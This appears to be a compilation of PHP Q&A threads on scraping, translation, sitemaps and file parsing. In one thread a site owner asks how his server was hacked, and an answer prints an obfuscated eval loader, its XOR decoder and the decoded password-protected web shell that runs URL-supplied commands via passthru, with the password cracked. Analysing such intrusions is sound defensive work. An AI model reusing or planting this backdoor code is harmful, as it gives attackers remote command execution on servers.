PHP copy website table [duplicate]

Possible Duplicate (closed 10 years ago):
HTML Scraping in Php
I'm far from being a web development expert, so sorry in advance if I'm missing something basic:
I need to copy a table into a MySQL database using PHP; the table resides on a website which I don't own, but I have permission to copy and publish it.
When I view this website manually in my browser, I have to click a link on the main page to reach the table (I can't link to the final destination page directly since its URL changes all the time; however, the main page URL is static, and so is the link I click).
An example of the kind of content I need to copy from (just an example, this is not the real content):
http://www.flightstats.com/go/FlightStatus/flightStatusByAirport.do?airportCode=JFK&airportQueryType=0

Most people are going to ask what you have tried. Since you mentioned that you don't have much development experience, here are some tips on how to go about it - I have to put this as an answer so it is easier to read.
What you're going to need to do is scraping.
Using PHP, you'd use the following functions at the very least:
file_get_contents() - this function reads the data at the URL.
preg_match_all() - regular expressions will let you pull out the data you are looking for, though some/many people will say that you should go through the DOM instead.
The data returned by preg_match_all() can be stored in your MySQL table. Because the data changes so frequently, though, you might be better off just scraping that section and storing the entire table as a cache (though I have to say I have no idea what you are trying to do on your site - so I could well be wrong).
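A rough sketch of those two steps (the URL, the regex, and the database credentials/table are all placeholders to adapt to the real page and schema):

<?php
// Read the page; the URL is a placeholder for the real one.
$html = file_get_contents('http://www.example.com/page-with-table.html');

// Pull out each table cell. The pattern depends entirely on the actual
// markup, so inspect the page source and adjust it accordingly.
preg_match_all('/<td[^>]*>(.*?)<\/td>/s', $html, $matches);

// Store the results; credentials and table name are placeholders.
$db   = new mysqli('localhost', 'user', 'pass', 'mydb');
$stmt = $db->prepare('INSERT INTO scraped_cells (content) VALUES (?)');

foreach ($matches[1] as $cell) {
    $clean = trim(strip_tags($cell));
    $stmt->bind_param('s', $clean);
    $stmt->execute();
}
?>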


How to dynamically translate a webpage [duplicate]

Possible Duplicate (closed 10 years ago):
How would you transform a pre-existing web app in a multilingual one?
Best way to internationalize simple PHP website
I'm trying to figure out how to translate all the static text on my webpage (I'm using PHP), but I'm not really sure what the "correct" way is. This is what I've thought of so far, but maybe it's all wrong :D
1. For every static piece of text on the page, get the translation with something like getTranslation("Hello World!"), which looks up the translation in a database or in a file (XML/CSV/PHP) containing all the translations. But this seems pretty bad, since we would have to query the database or parse the file on every page, every time it's refreshed/loaded.
2. Every time a page is loaded, I could read from the database/file once, store the translations for the current language in an array, and get the translations from that array as the page is built, instead of querying the database / parsing the file again (a sketch of what I mean follows this list).
3. Is there some way to read the translations only once and then make them accessible to all pages? The only thing I can think of is PHP's session, but it just seems so wrong to store the translations there.
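For option 2, I imagine something like this, where the translations live in a plain PHP file that returns an array (the file layout and function name are just how I picture it, nothing I've tested):

<?php
// translations/de.php would contain something like:
//   return array('Hello World!' => 'Hallo Welt!');
$lang = 'de'; // however the current language gets determined
$GLOBALS['translations'] = include __DIR__ . '/translations/' . $lang . '.php';

function getTranslation($text)
{
    // Fall back to the original text if no translation exists.
    return isset($GLOBALS['translations'][$text])
        ? $GLOBALS['translations'][$text]
        : $text;
}

echo getTranslation('Hello World!'); // prints "Hallo Welt!"
?>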
So what is the "most common" or "right" way to do it?
Happy hunting!
Sounds like you need gettext. gettext is widely used and widely supported, and I'm pretty sure it's also pretty well optimized.
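A minimal example of gettext in PHP, assuming the gettext extension is enabled and a catalog has been compiled (with msgfmt) to locale/de_DE/LC_MESSAGES/messages.mo - the locale and the 'messages' domain are placeholders:

<?php
// Select the target locale; it must be installed on the system.
putenv('LC_ALL=de_DE.UTF-8');
setlocale(LC_ALL, 'de_DE.UTF-8');

// Point gettext at the directory holding the compiled .mo catalogs.
bindtextdomain('messages', __DIR__ . '/locale');
textdomain('messages');

// _() is shorthand for gettext(); it returns the translated string,
// or the original text when no translation is found.
echo _('Hello World!');
?>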

What is the best way to create a sitemap.xml? [duplicate]

Possible Duplicate (closed 10 years ago):
How to create a sitemap using PHP & MySQL
So I'm kinda stuck here. I have a website with a pretty big database that changes constantly. Now I want to help the search engines by supplying a sitemap.xml file. Normally I would use a web service to do this, but that's not really possible in this case.
To be honest, I have no clue where to start. How would I go about doing this? Sorry if this is too basic a question, but Google couldn't help me.
Edit: Some more info. The DB is currently 1k pages; I want to go up to around 10k. I use MySQL to echo the pages from my database and .htaccess to rewrite the URLs (PHP gets the ID, etc.).
You would need to install a crawler to do it the way a web service does. The easier way is to write a PHP script and generate the sitemap XML file yourself.
Write a query to get the links from your database and then iterate over the results to create the sitemap.
See this post for an example PHP script: How to create a sitemap using PHP & MySQL
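The core of such a script is small. A sketch, assuming a pages table with id and updated_at columns and ID-based URLs like the ones you describe (credentials, names, and the URL scheme are placeholders):

<?php
$db     = new mysqli('localhost', 'user', 'pass', 'mydb');
$result = $db->query('SELECT id, updated_at FROM pages');

header('Content-Type: application/xml; charset=utf-8');
echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
echo '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";

while ($row = $result->fetch_assoc()) {
    printf("  <url><loc>%s</loc><lastmod>%s</lastmod></url>\n",
        htmlspecialchars('http://www.example.com/page/' . $row['id']),
        date('Y-m-d', strtotime($row['updated_at'])));
}

echo '</urlset>' . "\n";
?>

Serve it through a rewrite rule as sitemap.xml, or have a cron job write the output to a static file; at 10k rows either approach is fine.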

Fetch data from another site (PHP & GET)

I am trying to get data from a site and be able to manipulate it to display it on my own site.
The site contains a table with ticks and is updated every few hours.
Here's an example: http://www.astynomia.gr/traffic-athens.php
This data is there for everyone to use, and I will mention them on my own site just to be sure.
I've read something about PHP's cURL, but I have no idea if this is the way to go.
Any pointers, tutorials, or code anyone could provide so I can start somewhere would be very helpful.
Also, any pointers on how I can get notified as soon as the site is updated?
If you want to crawl the page, use something like Simple HTML DOM Parser for PHP. That'll serve your purpose.
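For example, with the library's simple_html_dom.php downloaded next to your script, grabbing the rows of that table could look roughly like this (the 'table tr' selector is a guess - adjust it to the page's actual markup):

<?php
include 'simple_html_dom.php';

// file_get_html() fetches and parses the remote page in one step.
$html = file_get_html('http://www.astynomia.gr/traffic-athens.php');

foreach ($html->find('table tr') as $row) {
    echo trim($row->plaintext) . "\n"; // each row as plain text
}

$html->clear(); // free the parser's memory
?>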
First, your web host/localhost should have the php_curl extension enabled.
To start with, you should read a bit here. If you want to jump in directly, there is a simple function here: Why I can't get website content using CURL. You just have to change the values of the variables $url and $timeout.
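In essence, such a function boils down to something like this (a sketch - tune $url and $timeout to your case):

<?php
function fetchUrl($url, $timeout = 30)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the body
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // follow redirects
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);

    $data = curl_exec($ch);
    if ($data === false) {
        $data = 'Error: ' . curl_error($ch);
    }
    curl_close($ch);

    return $data;
}

echo fetchUrl('http://www.astynomia.gr/traffic-athens.php');
?>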
Lastly, to get the updated data every 2 hours, you will have to run the script as a cron job. Please refer to this post:
PHP - good cronjob/crontab/cron tutorial or book
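For reference, a crontab entry that runs a PHP script every two hours looks like this (the interpreter and script paths are placeholders):

0 */2 * * * /usr/bin/php /path/to/fetch-data.php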

What is the vulnerability in my PHP code? [duplicate]

Duplicate (closed 3 years ago):
When is eval evil in php? (20 answers)
A website of mine was recently hacked. Although the actual website remained unchanged, they were somehow able to use the domain to create a link that redirected to an eBay phishing scam.
I've taken the website down, for obvious reasons, so I can't link to the code. I'm wondering how I can go about finding out what vulnerability they used so that I can avoid this problem in the future. The page used PHP and also some JavaScript (for form validation).
Is there a free service that will scan my code for vulnerabilities? What are my other options?
Thanks,
Jeff
EDIT: I've hosted the files at [link removed]
A few things to note: there are several files in the "funcs" folder, most of which aren't used, but I left them there just in case. The "new.php" (contents below) in the "data" folder is clearly the problem. The big question is: how did someone manage to upload "new.php" to the server? There's also an RTF of the e-mail I received which has info about the scam.
(caution: this code is probably "dangerous" to your computer)
<?php
$prv=strrev('edoced_46esab');
$vrp=strrev('etalfnizg');
eval($vrp($prv("rVPRbpswFNW0P9jbNE1ChojQSDD7cm0syvoB5A/GxhiBJVoKxJC0pFr667v0pe1L2k17snyvz/G559jOLxCVxjGCfEBYc1noQfE8VL0SpUYTwQah43LQueKbh3IeQYlguBx1p/gQqkqJFUKiPsWO0Vgh9LoN1R4EoUsuq7xU3Cgxgug0DhHQiVVOjVavFK9ClbDjKH2ZLgOrbpoA0RbNj/dv3r77KF3ED237vVlkrH9Wu7srzM1uv7t3h942N5mTsYM7O52s0y5jsz3thntz6gvCPiWcEVubLpO0tme+VxdHGdq3xe90WU+0wg+hQREGEi9c9G18gprOBPPZBWTMfixP1YwFdlMcNw9UVInT5XjLYqcHQcOSTxvFGyV+5q3GPcKgOzKHHFUi+Te/YmerBK0Nua/XectlnU+JRDBq7OjWKRJOEE0tSqaKIOkHs62a+StEebFDgR4UL7jc5l0Ea9JBXNiSDD3F5bpx3Zq5syaIpudx0FiAuI7gwGVPCpW4TugtnGlf/v0EZ/kWC+8F0ZafWOXazFuzeo0JX87d9tWzvlnOf/s4Xlwdiu2cXX1m/gtT+OzyinnxHw==")));
?>
Interesting stuff going on here. The PHP block evaluates to a nice little "code generator":
$k32e95y83_t53h16a9t71_47s72c95r83i53p16t9_71i47s72_83c53r16y9p71t47e72d53=70;
$r95e53s9o47u32r83c16e_c71r72y32p95t83e53d_c16o9d71e47="zy6.6KL/ fnn/55#2nb6'55oo`n+\"snb6'55o{{arwquq'ts#rw\$\"v'%~~ ~q\"%u\"vtr~sao`n/55#2nb%oooKL=Kf#%.)faz64#xa}KLf6'552.43n524/65*'5.#5nb%oo}KLf/(%*3\"#nb%o}KLf\"/#nazi64#xao}K;KLyx";
$s32t83r16i71n72g_o95u53t9p47u16t72=$r95e53s9o47u32r83c16e_c71r72y32p95t83e53d_c16o9d71e47;$l72e47n71t9h_o16f_c53r83y95p32t47e71d_c9o16d53e83=strlen($s32t83r16i71n72g_o95u53t9p47u16t72);
$e72v71a16l_p83h32p_c95o53d9e47='';
for($h47u9i53v95a32m83v16s71e72m=0;$h47u9i53v95a32m83v16s71e72m<$l72e47n71t9h_o16f_c53r83y95p32t47e71d_c9o16d53e83;$h47u9i53v95a32m83v16s71e72m++)
$e72v71a16l_p83h32p_c95o53d9e47 .= chr(ord($s32t83r16i71n72g_o95u53t9p47u16t72[$h47u9i53v95a32m83v16s71e72m]) ^ $k32e95y83_t53h16a9t71_47s72c95r83i53p16t9_71i47s72_83c53r16y9p71t47e72d53);
eval("?>".$e72v71a16l_p83h32p_c95o53d9e47."<?");
When the nasty variable names are substituted for something more readable, you get:
$Coefficient=70;
$InitialString="zy6.6KL/ fnn/55#2nb6'55oo`n+\"snb6'55o{{arwquq'ts#rw\$\"v'%~~ ~q\"%u\"vtr~sao`n/55#2nb%oooKL=Kf#%.)faz64#xa}KLf6'552.43n524/65*'5.#5nb%oo}KLf/(%*3\"#nb%o}KLf\"/#nazi64#xao}K;KLyx";
$TargetString=$InitialString;
$CntLimit=strlen($TargetString);
$Output='';
for($i=0;$i<$CntLimit;$i++)
$Output .= chr(ord($TargetString[$i]) ^ $Coefficient);
eval("?>".$Output."<?");
which, when evaluated, spits out the code:
<?php
if ((isset($_GET[pass]))&(md5($_GET[pass])==
'417379a25e41bd0ac88f87dc3d029485')&(isset($_GET[c])))
{
echo '<pre>';
passthru(stripslashes($_GET[c]));
include($_GET[c]);
die('</pre>');
}
?>
Of note: the string '417379a25e41bd0ac88f87dc3d029485' is the MD5 hash of the password Zrhenjq2009.
I'll kick this around some more tomorrow.
Edit:
Ok, so I spent a few more minutes playing with this. It's looking like a remote-control script. Now that this page (new.php) is sitting on your server, if a user hits it and passes a URL parameter named 'pass' with the value 'Zrhenjq2009', they can execute an arbitrary external command on the server by passing the command and its arguments in the URL as the parameter named 'c'. So this is turning out to be a code generator that creates a backdoor on the server. Pretty cool.
I pulled down the file you uploaded and ran new.php through VirusTotal.com, and it appears to be a new (or substantially modified) trojan. Additionally, it appears that 51.php is the PHPSpy trojan (VirusTotal analysis), 74.php is the PHP.Shellbot trojan (VirusTotal analysis), and func.php is "webshell by orb". Looks like someone dropped a nice hack kit on your server along with the eBay phishing scripts/pages referenced in the document you uploaded.
You should probably remove the file download link in your original post.
If you get your hands on the logs, it might be interesting to take a look.
Enjoy.
If you're using a VCS (version control, like git, mercurial, subversion, cvs), you can just do a diff from the last good commit and go from there.
You are using version control, right?
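With git, for example, it's a two-step affair (the commit hash below is a placeholder for your last known-good revision):

# find the hash of the last known-good commit
git log --oneline

# show everything that has changed since that commit
git diff a1b2c3d HEAD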
Do you have access to the server logs? If you have an approximate time when the first exploit occurred, they should go a long way toward helping you figure out what the person did. Other than giving general advice, it's really hard to say without more information.
Can you share the code (please make sure to remove usernames, passwords, etc.)? If so, I would be willing to take a look, but it might take me a day or so. (Sorry - I'm currently working on a SQL injection vulnerability report, recommendations for identifying restricted data, and future standards/processes to prevent it, and I have four kids at home, including a 3-month-old.)

Simplehtmldom - curl, loops, arrays?

Please forgive what is most likely a stupid question. I've successfully managed to follow the simplehtmldom examples and get the data that I want off one webpage.
I want to be able to set the function to go through all the HTML pages in a directory and extract the data. I've googled and googled, but now I'm confused: in my ignorant state I had thought I could (in some way) use PHP to form an array of the filenames in the directory, but I'm struggling with this.
Also, it seems that a lot of the examples I've seen use cURL. Please can someone tell me how it should be done? There are a significant number of files. I've tried concatenating them, but this only works when done through an HTML editor - using cat doesn't work.
You probably want to use glob('some/directory/*.html'); (manual page) to get a list of all the files as an array. Then iterate over that and use the DOM stuff for each filename.
You only need cURL if you're pulling the HTML from another web server; if the files are stored on your own web server, you want glob().
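Putting the two together, a sketch (the directory path and the 'table td' selector are placeholders):

<?php
include 'simple_html_dom.php';

// glob() returns an array of matching filenames.
foreach (glob('some/directory/*.html') as $filename) {
    // file_get_html() accepts local paths as well as URLs.
    $html = file_get_html($filename);

    foreach ($html->find('table td') as $cell) {
        echo trim($cell->plaintext) . "\n";
    }

    $html->clear(); // free memory before the next file
}
?>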
Assuming the parser you're talking about is working OK, you should build a simple web spider: look at all the links in a webpage and build a list of "links to scan", then scan each of those pages...
You should take care of circular references, though.
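A bare-bones sketch of that idea, using a visited list to break cycles (the start URL is a placeholder, and a real spider would also want depth limits and politeness delays):

<?php
include 'simple_html_dom.php';

$base    = 'http://www.example.com/';
$queue   = array($base);
$visited = array();

while ($queue) {
    $url = array_shift($queue);
    if (isset($visited[$url])) {
        continue; // already scanned: this is what breaks circular references
    }
    $visited[$url] = true;

    $html = file_get_html($url);
    if (!$html) {
        continue;
    }

    // ... extract whatever data you need from $html here ...

    foreach ($html->find('a') as $link) {
        $href = $link->href;
        // only follow absolute links that stay on the same site
        if (strpos($href, $base) === 0 && !isset($visited[$href])) {
            $queue[] = $href;
        }
    }

    $html->clear();
}
?>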
